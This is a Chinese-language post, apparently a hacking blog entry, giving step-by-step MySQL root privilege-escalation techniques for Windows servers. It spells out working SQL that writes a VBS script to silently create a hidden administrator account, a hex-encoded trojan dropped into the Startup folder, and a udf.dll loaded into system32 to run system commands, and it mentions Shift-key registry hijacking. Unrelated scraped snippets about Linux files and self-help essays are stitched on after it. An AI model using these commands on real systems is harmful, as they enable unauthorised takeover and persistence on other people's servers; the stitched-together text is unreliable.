作者:foolishqiang 原文位址:
mysql提權我在前面已經寫的很明白了,但是還有一些朋友root連線上了,但是無法執行cmd。無論執行什麼都返回:
資料庫查訊出錯,請檢查sql語句create function cmdshell returns string soname udf.dll的語法是否正確。cant open shared library udf.dll (errno: 0 )
那麼我們在利用伺服器元件來進行vbs提權:
構造語句:
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user foolishqiang foolishqiang /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators foolishqiang /add"",0) " );
///////////////////////
後面我加了乙個引數:0,意思為默默的執行。沒有任何回顯。0表示不彈出cmd視窗,安靜的執行。
上面的方法一般在加上我以前寫的乙個mysql提權應該能解決提權的問題了。我們也可以以16進製制寫exe檔案
create table a (cmd blob);
insert into a values (convert(木馬的16進製制**,char));
select * from a into dumpfile c:\documents and settings\all users\「開始」選單\程式啟動\foolishqiang.exe
注意:路徑一定要寫\ 倆個 因為要過濾乙個
應該說root的總結的差不多了 包括了dll提權。已經導vbs提權。exe提權,linx mysql backdoor提權等。
如果還要深入的話。幹點root
還有mix.dll。
create table temp_mix(abc longblob);
insert into temp_mix values(load_file(d:\udf.dll)); ///////////路徑
select * from temp_mix into dumpfile c:\windows\system32\udf.dll;
create function mycmd returns string soname udf.dll;
select mycmd(net user);
drop table if exists temp_mix;
這個一般用的不是很多。
我們也可以構造語句,來劫持登錄檔shift。而不去替換(有保護)。這樣也可以進行提權。
root的提權方法我基本已經都說了。
小菜愚見,大牛不要見笑
linux一切皆是檔案 LINUX一切皆檔案
只要用過linux的筒子,或者保守點說接觸到一些linux思想的同志肯定聽說過這樣一句話,在linux下,一切皆是檔案 不錯,今天walfred將在快速上手linux裝置驅動這一塊,談談linux的裝置也符合 一切皆是檔案 的思想在linux裝置驅動模型應用。如果你不理解linux裝置模型,請看下面...
EQ決定一切
eo是 情緒智商 的簡稱,由美國哈佛大學心理系教授丹尼爾 戈爾曼在1995年出版的書中提出。戈爾曼認為,eq包括抑制衝動 延遲滿足的克制力,包含了如何調適自己的情緒如何設身處地地為別人著想 感受別人的 感受的能力,以及如何建立良好的人際關係 培養自動自發的心靈動力 簡單說來,eq是一種為人的涵養,是...
心態決定一切
心態決定一切 1 放下壓力 累與不累,取決於自己的心態 心靈的房間,不打掃就會落滿灰塵。蒙塵的心,會變得灰色和迷茫。我們每天都要經歷很多事情,開心的,不開心的,都在心裡安家落戶。心裡的事情一多,就會變得雜亂無序,然後心也跟著亂起來。有些痛苦的情緒和不愉快的記憶,如果充斥在心裡,就會使人委靡不振。所以...